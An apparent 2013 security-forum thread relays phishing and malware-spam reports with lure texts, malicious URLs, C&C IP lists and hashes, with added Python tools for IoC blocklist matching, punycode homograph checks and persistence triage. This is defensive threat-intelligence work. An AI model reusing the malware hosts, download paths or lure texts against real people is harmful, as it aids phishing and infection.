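    """Undo the blog-style defanging: drop [donotclick], close the ' .' and ' :' gaps,
    strip any scheme and query string, lower-case the result."""
    s = ioc.strip().replace("[donotclick]", "")
    s = re.sub(r"\s+([.:])", r"\1", s)
    s = re.sub(r"^hxxps?://|^https?://", "", s, flags=re.IGNORECASE)
    return s.split("?", 1)[0].lower()


def compile_blocklist(iocs):
    """Sort IoCs into IP networks (a bare IP becomes a /32), bare domains and host/path URLs."""
    nets, hosts, urls = [], set(), set()
    for raw in iocs:
        ioc = refang(raw)
        try:
            nets.append(ipaddress.ip_network(ioc, strict=False))
            continue
        except ValueError:
            pass
        (urls if "/" in ioc else hosts).add(ioc)
    return nets, hosts, urls


def match_url(url: str, blocklist):
    """Return (kind, matched_ioc) for a URL that hits the blocklist, else None."""
    nets, hosts, urls = blocklist
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    key = parts.netloc.lower() + parts.path      # host[:port]/path, query ignored
    if key in urls:
        return "url", key
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Domain: match the host itself or any parent domain, on label boundaries only,
        # so "notvirgin-altantic.net" does not match "virgin-altantic.net".
        labels = host.split(".")
        for i in range(len(labels) - 1):
            candidate = ".".join(labels[i:])
            if candidate in hosts:
                return "host", candidate
        return None
    for net in nets:
        if ip in net:
            return "net", str(net)
    return None


def scan_log(log_text: str, blocklist):
    """Run every URL in the log through the blocklist and collect the hits in order."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        match = match_url(fields[3], blocklist)
        if match:
            hits.append({"client": fields[1], "url": fields[3], "kind": match[0], "ioc": match[1]})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG, compile_blocklist(DEFANGED_IOCS)):
        print(f"{hit['client']} -> {hit['url']}  [{hit['kind']}: {hit['ioc']}]")
```

The URL entries are matched on host, port and path only; the CIDR entry catches the 62.76.190.11 host from the "Referral link" post even though that exact address is not on the list, which is the point of blocking the whole range as dynamoo suggests.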
AplusWebMaster
2013-05-20, 14:35
FYI...
Something evil on 50.116.28.24
- http://blog.dynamoo.com/2013/05/something-evil-on-501162824.html
19 May 2013 - "50.116.28.24 (Linode, US) is hosting the callback servers for some Mac malware as mentioned here* and here** plus some other suspect sites. I would advise that you assume that -all- domains hosted on this IP are malicious..."
(More detail at the dynamoo URL above.)
* http://www.f-secure.com/weblog/archives/00002554.html
** http://forums.macrumors.com/showthread.php?t=1583233
___
Wells Fargo Credentials Phish
- http://threattrack.tumblr.com/post/50913877787/wells-fargo-credentials-phish
20 May 2013 - "Subjects Seen:
Account Update
Typical e-mail details:
In order to safeguard your account, we require that you confirm your details.
To help speed up this process, please access the following link so we can complete the verification of your Wells Fargo information details.
To get started, visit the link below:
Wells Fargo Online Confirmation
Malicious URLs
update.id5027-wellsfargo .com/index.php?id=586616
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/b0d8988c075155635a6682da8f92e4a0/tumblr_inline_mn3umbkVzo1qz4rgp.png
___
Malicious Invoice Attachment Spam
- http://threattrack.tumblr.com/post/50914381181/malicious-invoice-attachment-spam
20 May 2013 - "Subjects Seen:
invoice copy
Typical e-mail details:
Kindly open to see export License and payment invoice attached,
meanwhile we sent the balance payment yesterday.
Please confirm if it has settled in your account or you can call if
there is any problem.
Thanks
Karen parker
Spam contains malicious attachment.
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/cbdf76f6219dbb3755e51a541a68aad0/tumblr_inline_mn3v14O1qo1qz4rgp.png
___
Chase Bank Credentials Phish
- http://threattrack.tumblr.com/post/50929274377/chase-bank-credentials-phish
20 May 2013 - "Subjects Seen:
Billing Code:[removed]
Typical e-mail details:
During regularly scheduled account maintenance and verification procedures, we have detected a slight error in your billing information.
This might be due to either of the following reasons:
1. A recent change in your personal information ( i.e. change of address).
2. Submitting invalid information during the initial sign up process.
3. An inability to accurately verify your selected option of payment due to an internal error within our processors.
Click on the guide-link below and follow the directions or please call our Online Helpdesk.
Regards,
Chase Online
Billing Department
Thanks for your co-operation.
Malicious URLs
goodnickfitness .com.au/hnav.html
diamondtek .cl/diamondtek .cl/http/online.chaseonline1/com/logon.html
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/04079d40aed3b5bc8b4adb60986fe381/tumblr_inline_mn45ob1itt1qz4rgp.png
___
Blackhole Spam Run evades detection using Punycode
- http://blog.trendmicro.com/trendlabs-security-intelligence/blackhole-spam-run-evades-detection-using-punycode/
May 20, 2013 - "... we have seen a slew of spam crafted as a notice from the popular retail chain Walmart. However, this spam run offers something different.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/05/BHEK-walmart.jpg
... some of the URLs lead to Cyrillic domain names. These domains were translated into the English alphabet through punycode. Punycode* is a way to convert Unicode characters into a smaller character set. URLs in punycode have to be decoded first in order to see their original format. The use of international domain names (IDNs) can pose additional security risks to users. Users can be redirected to a phishing page that appears to have the same URL as a legitimate site. IDNs also allow spammers to create more spam domains not limited to English characters. This can make blocking malicious sites more difficult. This technique is not new, but seeing punycode used in a BHEK email campaign is unusual. Users who click the links are redirected to several sites, until they are led to the site hosting malware (detected as TROJ_PIDIEF.SMXY), which exploits a vulnerability in Adobe Reader and Acrobat (CVE-2009-0924) to download and execute other malware onto the vulnerable system. This attempt at evading detection is not surprising, given how 2013 is shaping up to be the year of refining existing tools. In our 1Q 2013 Security Roundup, we already noticed how dated threats like Asprox and banking Trojans like CARBERP were returning to the scene with new and improved features. We can expect this trend to continue this year, though new threats can always appear anytime soon..."
* http://www.ietf.org/rfc/rfc3492.txt
:mad: :fear: :fear:
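The Trend Micro item above says the Walmart-themed run hid Cyrillic domains behind punycode and that such links have to be decoded before they can be checked. As an added example, not code from Trend Micro or from the spam run, here is how that decoding looks in Python using the standard library's idna codec, plus the check an analyst most wants alongside it: whether any label of the decoded host mixes scripts (a Latin name with one Cyrillic letter swapped in, the classic look-alike). The sample URLs are constructed for the example: one plain host, one all-Cyrillic name, and one "walmart" look-alike whose second letter is Cyrillic U+0430, none of them taken from the actual campaign.

```python
import unicodedata
from urllib.parse import urlsplit


def punycode_host(unicode_host: str) -> str:
    """The ASCII ("xn--") form of a Unicode hostname, which is what appears in a raw URL."""
    return unicode_host.encode("idna").decode("ascii")


def decode_idn_host(host: str) -> str:
    """Turn xn-- labels back into Unicode; plain ASCII labels pass through unchanged."""
    labels = []
    for label in host.lower().split("."):
        if label.startswith("xn--"):
            try:
                label = label.encode("ascii").decode("idna")
            except UnicodeError:
                pass  # malformed punycode: keep the raw label (still reported as IDN)
        labels.append(label)
    return ".".join(labels)


def scripts_of(label: str) -> set:
    """Scripts used by the letters of one label, read off the Unicode character names:
    {'LATIN'} for 'walmart', {'CYRILLIC', 'LATIN'} for a look-alike with a Cyrillic 'а'."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in label if ch.isalpha()}


def assess_url(url: str) -> dict:
    """Decode the host of a URL and report whether it is an IDN and whether any
    single label mixes scripts, the usual homograph sign."""
    host = (urlsplit(url).hostname or "").lower()
    decoded = decode_idn_host(host)
    labels = decoded.split(".")
    return {
        "host": host,
        "decoded": decoded,
        "idn": any(l.startswith("xn--") for l in host.split(".")),
        "mixed_script": any(len(scripts_of(l)) > 1 for l in labels),
        "scripts": sorted(set().union(*(scripts_of(l) for l in labels))),
    }


def flagged(urls):
    """Only the URLs whose host uses punycode, decoded for the analyst."""
    return [r for r in map(assess_url, urls) if r["idn"]]


# Constructed sample links: a plain one, a Cyrillic-only IDN, and a look-alike whose
# second letter is Cyrillic U+0430 rather than Latin 'a'. None are from the spam run.
SAMPLE_URLS = [
    "http://www.walmart.com/account/order/3795695",
    "http://" + punycode_host("пример.com") + "/news/index.php",
    "http://" + punycode_host("w\u0430lmart.com") + "/news/ask-index.php",
]

if __name__ == "__main__":
    for report in map(assess_url, SAMPLE_URLS):
        print(report)
```

A mail gateway rule built on this would treat any "idn" hit as worth decoding in the quarantine view and any "mixed_script" hit as a strong phishing indicator; an all-Cyrillic domain on its own is legitimate for plenty of sites, so it is reported rather than blocked outright.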
AplusWebMaster
2013-05-21, 15:30
FYI...
Fake NATO jobs SPAM ...
- http://blog.webroot.com/2013/05/21/cvs-and-sensitive-info-soliciting-email-campaign-impersonates-nato/
May 21, 2013 - "Want to join the North Atlantic Treaty Organization (NATO)?... you’d be involuntarily sharing your information with what looks like an intelligence gathering operation...
Sample screenshot of the -fake- NATO Employment Application Form:
> https://webrootblog.files.wordpress.com/2013/05/fake_nato_employment_application.png
A copy of the -fake- NATO Employment Application Form
> http://webrootblog.files.wordpress.com/2013/05/nato-employment-application-form.pdf
A copy of the -fake- NATO Interview Form
> http://webrootblog.files.wordpress.com/2013/05/nato-interview-form.pdf
... NATO impersonating domain name reconnaissance:
nspa-nato.int.tf – 188.40.117.12; 188.40.70.27; 188.40.70.29
Name server: ns1.idnscan .net
Name server: ns2.idnscan .net
usnato-hr.org – 208.91.198.24
Name Server: DNS1.SPIRITDOMAINS .COM
Name Server: DNS2.SPIRITDOMAINS .COM
... We know that on 2013-05-10 07:01:46 CET, responding to the same IP (188.40.117.12) was also the following Black Hole Exploit Kit redirecting URLs...
Always watch where you apply and be aware of offers which sound too good to be true."
(More detail at the webroot URL above.)
___
Fake Delivery_Information_ID-000512430489234.zip
- http://blog.dynamoo.com/2013/05/deliveryinformationid-000512430489234zip.html
21 May 2013 - "The file Delivery_Information_ID-000512430489234.zip is being promoted by a spam run (perhaps aimed at Italian users, although all the hosts are German)... best guess is that it is a fake package delivery report. So far I have identified three download locations for the malicious ZIP file:
[donotclick]www.interapptive .de/get/Delivery_Information_ID-000512453420234.zip
[donotclick]www.vankallen .de/get/Delivery_Information_ID-000512453420234.zip
[donotclick]www.haarfashion .de/get/Delivery_Information_ID-000512430489234.zip
The ZIP file decompresses to Delivery_Information_ID-000512453420234.Pdf_______________________________________________________________.exe (note all those underscores!) which has a VirusTotal detection rate of 23/47* and has the following checksums:
MD5: 791a8d50acfea465868dfe89cdadc1fc
SHA1: be67a7598c32caf3ccea0d6598ce54c361f86b0a
SHA256: 9ae8fe5ea3b46fe9467812cbb2612c995c21a351b44b08f155252a51b81095d7
The Anubis report is pretty inconclusive but ThreatTrack reports** [pdf] some peer-to-peer traffic and also some rummaging around the Windows Address Book (WAB)."
* https://www.virustotal.com/en/file/9ae8fe5ea3b46fe9467812cbb2612c995c21a351b44b08f155252a51b81095d7/analysis/1369127051/
File name: Delivery_Information_ID-000512453420234.Pdf______________________...
Detection ratio: 23/47
Analysis date: 2013-05-21
** http://www.dynamoo.com/files/analysis_30721_791a8d50acfea465868dfe89cdadc1fc.pdf
___
Malicious eFax Corporate Spam
- http://threattrack.tumblr.com/post/50992552536/malicious-efax-corporate-spam
21 May 2013 - "Subjects Seen:
Corporate eFax message from [removed]
Typical e-mail details:
You have received a 3 fax at 2013-05-07 10:24:18 CST.
* The reference number for this fax is [removed].
Please visit efaxcorporate.com/corp/twa/page/customerSupport if you have any questions regarding this message or your service. You may also e-mail our corporate support department at corporatesupport @mail.efax.com.
Thank you for using the eFax Corporate service!
Malicious URLs
116.122.158.195 :8080/ponyb/gate.php
mail.yaklasim .com:8080/ponyb/gate.php
debthelpsmart .org/ponyb/gate.php
debtsmartretirement .com/ponyb/gate.php
50.63.222.182 /GGBG2H.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/04b210cbaad377d10a19ce26b5dfe3a7/tumblr_inline_mn5mcsC2PH1qz4rgp.png
___
prospectdirect .org SPAM
- http://blog.dynamoo.com/2013/05/prospectdirectorg-spam.html
21 May 2013 - "Everything that this spammer says is a lie:
From: Emily Norton [emily.norton @prospectdirect .org]
To: [redacted]
Date: 21 May 2013 16:33
Subject: Cater to your email marketing needs
Signed by: prospectdirect .org
Hello,
I hope you don’t mind but I just wanted to contact you to discuss your email marketing strategy. If you don’t currently have one that is working for you then our client can help.
The company I am contacting you on behalf of have the dedicated knowledge and services to cater to your email marketing needs.
If you would like a quote please complete this form: http ://prospectdirect .org/email-marketing-strategy
Leave your details at the link above or reply with any requirements.
Kind Regards,
Emily Norton
75 Glandovey Terrace, Newquay, Cornwall TR8 4QD
Tel: 0843 289 4698
This email (including any attachments) is intended only for the recipient(s) named above. It may contain confidential or privileged information and should not be read, copied or otherwise used by any other person. If you are not the named recipient please contact the sender and delete the email from your system. If you would no longer like to receive emails from us please unsubscribe here http ://www.prospectdirect .org/landing/page.php?jq=[snip]
Firstly, the email was sent to a scraped address from the website of the Slimeware Corporation and isn't any sort of opted-in address at all. The address of "75 Glandovey Terrace, Newquay, Cornwall TR8 4QD" simply does -not- exist, and the telephone number of 0843 289 4698 appears to belong to a completely -unrelated- company. I very much doubt there is anybody called "Emily Norton" involved, and there is no company in the UK with the name "Prospect Direct". The website prospectdirect .org itself carefully hides any contact details, the WHOIS details are anonymous, the domain was created on 2012-07-19 and is hosted on 109.235.51.98 (Netrouting / Xeneurope, Netherlands). There are no contact details on the website and there is no identifying information at all... it hasn't just been omitted by accident, the whole thing has been left meticulously clean by a professional spamming outfit.
> https://lh3.ggpht.com/-t6eWqUjKl84/UZvEKHeSs4I/AAAAAAAABOo/XRPXQOIt8rg/s400/prospect-direct.png
I would recommend giving these spammers a wide berth given their catalogue of lies."
:mad: :mad:
AplusWebMaster
2013-05-22, 20:03
FYI...
Malicious ADP Spam
- http://threattrack.tumblr.com/post/51071699249/malicious-adp-invoice-spam
22 May 2013 - "Subjects Seen:
Invoice #[removed] - Remit file
Typical e-mail details:
Attached is the invoice (ADP_Invoice_[removed].zip) received from your bank.
Please print this label and fill in the requested information. Once you have filled out
all the information on the form please send it to payroll.invoices @adp .com.
For more details please see the attached file.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you ,
Automatic Data Processing, Inc...
Malicious URLs
116.122.158.195 :8080/ponyb/gate.php
mail.yaklasim .com:8080/ponyb/gate.php
10healthynails .com/ponyb/gate.php
advprintgraphics .com/ponyb/gate.php
50.63.222.182 /GGBG2H.exe
Malicious File Name and MD5:
ADP_Invoice_[removed].zip (638d32dc80678f17609fe21dF73c6f6d)
ADP_Invoice_[removed].exe (a8aab9bcd389348823b77b090fb0afcc)
uszyly.vxe (707423e64a6ab41d694a9e1d8e823d292)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d2634805a2675263f58d6f2fdf754515/tumblr_inline_mn7fuoyMJg1qz4rgp.png
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Purchase Order E-mail Messages - 2013 May 22
Fake Xerox Scan Attachment E-mail Messages - 2013 May 22
Fake Product Order Quote Request E-mail Messages - 2013 May 22
Fake Document Sharing E-mail Messages - 2013 May 22
Fake Facebook Voice Comment E-mail Message - 2013 May 22
Fake DHL Order Tracking Notification E-mail Messages - 2013 May 22
Fake Product Order Quote Request E-mail Messages - 2013 May 22
Fake Check Return Notification E-mail Messages - 2013 May 22
Fake Picture Link E-mail Messages - 2013 May 22
Fake Money Transfer Notification E-mail Messages - 2013 May 22
Fake Invoice Statement Attachment E-mail Messages - 2013 May 22
Fake Product Order E-mail Messages - 2013 May 22
Fake Holiday Photo Sharing Request E-mail Messages - 2013 May 22
Fake Scanned Document Attachment E-mail Messages - 2013 May 22
Fake Payment Request Notification E-mail Messages - 2013 May 22
(More detail and links at the cisco URL above.)
:fear: :mad:
AplusWebMaster
2013-05-23, 13:54
FYI...
Spear-phish e-mails lead to APT
- https://atlas.arbor.net/briefs/index#-1950400672
Elevated Severity
May 22, 2013
Yet another targeted attack is dissected. Password theft was one of the motivating factors in the campaign.
Analysis: Well-crafted spear-phish e-mails were sent to the victim organizations. These spear phish included exploit code for patched vulnerabilities in Microsoft Office and also delivered bait files of interest to the target. In some cases, the bait files contain exploit code and in other cases they merely serve as a distraction. This is a tried-and-true method in wide use by cybercriminals and nation-state espionage actors. Once the malware is installed, credential theft applications can be used. The document provided by Trend includes various Indicators of Compromise (IOCs) that organizations can use to help detect if they have been or are currently a victim. Additionally, domains used for malicious purposes are sometimes re-used at a later time, so keeping an eye on DNS logs and HTTP activity can help spot a new campaign re-using older infrastructure.
Source: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-safe-a-targeted-threat.pdf
- http://blog.trendmicro.com/trendlabs-security-intelligence/hiding-in-plain-sight-a-new-apt-campaign/
"... The distribution method of this campaign involves spear-phishing emails that contain a malicious attachment exploiting a Microsoft Office vulnerability (CVE-2012-0158*)..."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158 - 9.3 (HIGH) - MS12-027
- https://www.net-security.org/malware_news.php?id=2500
May 20, 2013 - "... Dubbed "Safe," the campaign has first been spotted in October 2012 and has so far resulted in nearly 12,000 unique IP addresses spread over more than 100 countries to be connected to two sets of command-and-control (C&C) infrastructures..."
___
Fake ‘Export License/Payment Invoice’ emails lead to malware
- http://blog.webroot.com/2013/05/23/fake-export-licensepayment-invoice-themed-emails-lead-to-malware/
May 23, 2013 - "... just intercepted yet another currently ongoing malicious spam campaign, enticing users into executing a fake Export License/Payment Invoice. Once gullible and socially engineered users do so, their PCs automatically join the botnet operated by the cybercriminals. More details:
Detection rate for the malicious executable: MD5: 4e7dc191117a6f30dd429cc619041552 * ... Trojan.Win32.Inject.foiq; Trojan.Zbot.
Once executed, the sample starts listening on port 28723...
It then phones back to the following C&C servers:
213.230.101.174 :11137
87.203.65.0 :12721
180.241.97.79 :16114
83.7.104.50 :13647
84.59.222.81 :10378
194.94.127.98 :25549
98.201.143.22 :19595
78.139.187.6 :14384
180.183.178.134 :20898
We’ve also seen the following C&C server IP (194.94.127.98) in previously profiled malicious campaigns... As well as 78.139.187.6 ... We’re aware of more MD5s that phoned back to the same IPs over the last couple of days..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/de224cd737587233cfbec4a648de36dba5f620bd44c9f35a7577a82373e202dc/analysis/1369151297/
File name: invoice copy.exe
Detection ratio: 33/47
Analysis date: 2013-05-21
___
Fake FBI Ransomware - spikes...
- http://blog.webroot.com/2013/05/23/recent-spike-in-fbi-ransomware-striking-worldwide/
May 23, 2013 - "Recently we have seen a spike of this ransomware in the wild as it appears as though its creators are not easily giving up. This infection takes your computer hostage and makes it look as though the authorities are after you, when in reality this is all just an elaborate attempt to make you -pay- to unblock your computer. Once infected, a warning similar to the one below* will take up your entire screen in such a way that you can’t get around it, thus effectively blocking you from accessing your files, programs or anything else on your computer. To further scare you into believing that you’ve been caught in illegal activity, your IP address, rough location, internet service provider, operating system and webcam image may be displayed.
* https://webrootblog.files.wordpress.com/2013/05/fbicyberdiv.png?w=869
To ensure maximum profits, the malware writers made sure that everyone understood their warning and payment instructions by localizing the infection around the world... there are variants of this infection that will encrypt your files so even after the infection is removed, documents, pictures and many other files on the hard drive will be inaccessible. Once the files are encrypted it can be very difficult or impossible to restore the original unencrypted versions. To avoid data loss, we strongly suggest periodically backing up your data...The infection executable may be located in the AppData, Temp, or User Profile directories and typically loads by adding itself to the Run keys or by modifying the Winlogon Shell entry. In some cases it may load using only a shortcut that’s placed in the Startup folder..."
:mad::fear::fear:
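The persistence locations the Webroot post names (Run keys, the Winlogon Shell value, a Startup-folder shortcut, with the dropper sitting under AppData, Temp or the user profile) are quick to triage by hand. The script below is an added example, not code from the Webroot post: the classification runs over a constructed set of registry values and Startup-folder names so it can be exercised on any platform, and the optional live collector uses the standard Windows registry paths (assumed here) through winreg when it is run on a Windows host.

```python
"""Triage Windows auto-start locations for the persistence pattern above:
a dropper under AppData / Temp / the user profile, loaded from a Run key,
a modified Winlogon Shell value, or a shortcut in the Startup folder.
Added example; the registry paths are the standard ones, assumed here."""
import os
import re
from typing import Dict, List

# Directories the post says the executable lives in (XP and Vista+ layouts).
USER_WRITABLE = re.compile(
    r"\\(AppData|Application Data|Local Settings\\Temp|Temp)\\"
    r"|\\(Users|Documents and Settings)\\[^\\]+\\",
    re.IGNORECASE,
)
STARTUP_EXT = (".lnk", ".exe", ".vbs", ".js", ".bat", ".cmd")


def triage(entries: Dict[str, str], startup_items: List[str]) -> List[str]:
    """entries: {registry value path -> data}; startup_items: file names in a
    Startup folder. Returns human-readable findings for an analyst to review."""
    findings: List[str] = []
    for location, data in entries.items():
        if location.lower().endswith(r"\winlogon\shell"):
            # The only legitimate Shell value is explorer.exe; the lockers
            # append or replace it so their screen comes up at logon.
            if data.strip().lower() != "explorer.exe":
                findings.append(f"Winlogon Shell modified: {location} = {data}")
        elif USER_WRITABLE.search(data):
            findings.append(f"Run entry in user-writable path: {location} = {data}")
    for name in startup_items:
        if name.lower().endswith(STARTUP_EXT):
            findings.append(f"Startup folder item to review: {name}")
    return findings


def collect_from_registry() -> Dict[str, str]:
    """Live collection; returns {} where winreg is unavailable (non-Windows)."""
    try:
        import winreg
    except ImportError:
        return {}
    hives = {"HKCU": winreg.HKEY_CURRENT_USER, "HKLM": winreg.HKEY_LOCAL_MACHINE}
    run = r"Software\Microsoft\Windows\CurrentVersion\Run"
    winlogon = r"Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
    out: Dict[str, str] = {}
    for hive_name, hive in hives.items():
        try:
            with winreg.OpenKey(hive, run) as key:
                i = 0
                while True:
                    try:
                        name, data, _ = winreg.EnumValue(key, i)
                    except OSError:
                        break
                    out[f"{hive_name}\\{run}\\{name}"] = str(data)
                    i += 1
        except OSError:
            pass
        try:
            with winreg.OpenKey(hive, winlogon) as key:
                data, _ = winreg.QueryValueEx(key, "Shell")
                out[f"{hive_name}\\{winlogon}\\Shell"] = str(data)
        except OSError:
            pass
    return out


def collect_startup_items() -> List[str]:
    """Per-user Startup folder contents; empty list off Windows."""
    base = os.environ.get("APPDATA", "")
    path = os.path.join(base, r"Microsoft\Windows\Start Menu\Programs\Startup")
    return os.listdir(path) if base and os.path.isdir(path) else []


# Constructed sample, not data from any infected host.
SAMPLE_ENTRIES = {
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth":
        r"C:\Program Files\Windows Defender\MSASCuiL.exe",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ksrv":
        r"C:\Users\alice\AppData\Roaming\ksrv\ksrv.exe",
    r"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell":
        r"explorer.exe,C:\Users\alice\AppData\Local\Temp\lock.exe",
}
SAMPLE_STARTUP = ["desktop.ini", "update.lnk"]

if __name__ == "__main__":
    live = collect_from_registry()
    entries, startup = (live, collect_startup_items()) if live else (SAMPLE_ENTRIES, SAMPLE_STARTUP)
    for finding in triage(entries, startup):
        print(finding)
```

The output is a review list, not a verdict: plenty of legitimate software also autostarts from AppData, so each hit needs the file checked (hash, signature, VirusTotal) before it is removed, and a locked machine is normally triaged from Safe Mode or an offline boot where these keys can be read and repaired.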
AplusWebMaster
2013-05-24, 17:48
FYI...
Malicious UPS Spam
- http://threattrack.tumblr.com/post/51223546153/malicious-ups-spam
24 May 2013 - "Subjects Seen:
UPS - Your package is available for pickup ( Parcel [removed] )
Typical e-mail details:
The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.
You may pickup the parcel at our post office.
Please attention!
For mode details and shipping label please see the attached file.
Print this label to get this package at our post office.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you,
UPS Logistics Services.
Malicious URLs
116.122.158.195 :8080/ponyb/gate.php
50.63.222.182 /GGBG2H.exe
Malicious File Name and MD5:
UPS_Label_[removed].zip (667cf9590337d47f8c23053a8b2480a1)
UPS_Label_[removed].exe (1ef1438e2f2273ddbaf543dcdbaea5b1)
73036718.exe (c7e0c3d8b14e8755d32e27051d0e6477)
ThreatAnalyzer Report: http://db.tt/gTlNJnGy
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/990950926ca5cbe1ceabe7576d46d4da/tumblr_inline_mnb1xneaHb1qz4rgp.png
___
Bank of America Credentials Phish
- http://threattrack.tumblr.com/post/51224876478/bank-of-america-credentials-phish
24 May 2013 - "Subjects Seen:
Bank of America alert: Your account has been locked
Typical e-mail details:
There are a number of invalid login attempts on your account. We had to believe that, there might be some security problems on your account. So we have decided to put an extra verification process to ensure your identity and your account security.
Please click here to continue the verification process and ensure your account security.
Malicious URLs
radiojetaislame .com/images/safe5
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c41b9c753a7195c19dd10f0c546941c6/tumblr_inline_mnb3bo7cwo1qz4rgp.png
___
Fake Chase "Incoming Wire Transfer" SPAM / incoming_wire_05242013.zip
- http://blog.dynamoo.com/2013/05/chase-incoming-wire-transfer-spam.html
24 May 2013 - "This fake Chase "Incoming Wire Transfer" email has a malicious attachment...
Date: Fri, 24 May 2013 09:18:23 -0500 [10:18:23 EDT]
From: Chase [Chase @emailinfo.chase .com]
Subject: Incoming Wire Transfer
Note: This is a service message with information related to your Chase account(s)...
Screenshot: https://lh3.ggpht.com/-ofvJxQkPoeA/UZ97fjaJ3pI/AAAAAAAABPM/dVBJcBLjNbI/s1600/chase.png
The attachment incoming_wire_05242013.zip contains an executable incoming_wire_05242013.exe with a detection rate of 9/47 at VirusTotal*. The ThreatTrack report** [pdf] and ThreatExpert report*** show various characteristics of this malware, in particular a callback to the following IPs and domains:
116.122.158.195
188.93.230.115
199.168.184.197
talentos.clicken1 .com
Checksums are as follows:
MD5 f9182e5f13271cefc2695baa11926fab
SHA1 b3cff6332f2773cecb2f5037937bb89c6125ec15
SHA256 0a23cdcba850056f8425db0f8ad73dca7c39143cdafc61c901c8c3428f312f2d
* https://www.virustotal.com/en/file/0a23cdcba850056f8425db0f8ad73dca7c39143cdafc61c901c8c3428f312f2d/analysis/1369405971/
File name: incoming_wire_05242013.exe
Detection ratio: 9/47
Analysis date: 2013-05-24
** http://www.dynamoo.com/files/analysis_30795_f9182e5f13271cefc2695baa11926fab.pdf
*** http://www.threatexpert.com/report.aspx?md5=f9182e5f13271cefc2695baa11926fab
___
Compromised Indian gov't Web site leads to BlackHole Exploit Kit
- http://blog.webroot.com/2013/05/24/compromised-indian-government-web-site-leads-to-black-hole-exploit-kit/
May 24, 2013 - "Our sensors recently picked up a Web site infection, affecting the Web site of the Ministry of Micro And Medium Enterprises (MSME DI Jaipur). And although the Black Hole Exploit Kit serving URL is currently not accepting any connections, it’s known to have been used in previous client-side exploit serving campaigns...
Sample screenshot of the affected Web site:
> https://webrootblog.files.wordpress.com/2013/05/indian_government_web_site_hacked_compromised_black_hole_exploit_kit_01.png
Sample compromised URLs:
hxxp ://sisijaipur .gov.in/cluster_developement.html
hxxp ://msmedijaipur .gov.in/cluster_developement.html
Detection rate for the malicious script: MD5: 44a8c0b8d281f17b7218a0fe09840ce9 * ... Trojan:JS/BlacoleRef.W; Trojan-Downloader.JS.Iframe.czf.
Malicious domain names/redirectors reconnaissance:
888-move-stuff .com – 50.63.202.21 – Email: van2move @yahoo .com
888movestuff .com – 208.109.181.190 – Email: van2move @yahoo .com
jobbelts .com (redirector/C&C) – 98.124.198.1 – Email: aanelli @yahoo .com
More malicious domains are known to have been responding to the same IP in the past (98.124.198.1)... MD5s are also known to have phoned back to the same (redirector/C&C) IP in the past... phoning back to vnclimitedrun .in:443 (199.59.166.86). In 2012, the same IP was also seen in a malvertising campaign..."
* https://www.virustotal.com/en/file/ed159274fe4d49ec3ec48ce31fe326a3d2acb837c5ae435fbd2a9095c2adae20/analysis/1369337259/
File name: Indian.html
Detection ratio: 24/47
Analysis date: 2013-05-23
:mad: :fear:
AplusWebMaster
2013-05-28, 02:17
FYI...
Fake Citibank SPAM / Statement 57-27-05-2013.zip
- http://blog.dynamoo.com/2013/05/citibank-spam-statement-57-27-05-2013zip.html
27 May 2013 - "This fake Citibank email has a malicious attachment:
Date: Mon, 27 May 2013 23:25:06 +0530 [13:55:06 EDT]
From: Millard Hinton [leftoverss75 @gmail .com]
Subject: Merchant Statement
Enclosed (xlsx|Exel file|document|file) is your Citibank Paymentech electronic Merchant Billing Statement.
If you need assistance, please (contact|message|call) your Account Executive or call Merchant Services at the telephone number listed on your statement.
PLEASE DO NOT RESPOND BY USING REPLY. This (email|mail) is sent from an unmonitored email address, and your response will not be received by Citibank Paymentech.
Citibank Paymentech will not be responsible for any liabilities that may result from or relate to any failure or delay caused by Citibank Paymentech's or the Merchant's email service or otherwise. Citibank Paymentech recommends that Merchants continue to monitor their statement information regularly...
The attachment Statement 57-27-05-2013.zip contains a malicious executable Statement 57-27-05-2013.exe with a VirusTotal result of 12/46*. The Comodo CAMAS report and Anubis report are pretty inconclusive. The ThreatTrack report** [pdf] is more comprehensive, showing some peer-to-peer traffic and accessing of the WAB. Simseer's prognosis*** is that this is a Zbot variant. For the record, these are the checksums involved:
MD5 0bbf809dc46ed5d6c9f1774b13521e72
SHA1 9a50fa08e71711d26d86f34d8179f87757a88fa8
SHA256 00b832b5128a7caffe8bd4a854b1e112d488acb37f3a787245d077ae0d106400
* https://www.virustotal.com/en/file/00b832b5128a7caffe8bd4a854b1e112d488acb37f3a787245d077ae0d106400/analysis/1369679734/
File name: Statement 57-27-05-2013.exe
Detection ratio: 12/47
Analysis date: 2013-05-27
** http://www.dynamoo.com/files/analysis_30823_0bbf809dc46ed5d6c9f1774b13521e72.pdf
*** http://www.simseer.com/webservices/SimseerSearch/SimseerSearch-print-report.php?h=0bbf809dc46ed5d6c9f1774b13521e72
:fear::mad:
AplusWebMaster
2013-05-28, 14:58
FYI...
Something evil on 158.255.212.96 and 158.255.212.97
- http://blog.dynamoo.com/2013/05/something-bit-evil-on-15825521296-and.html
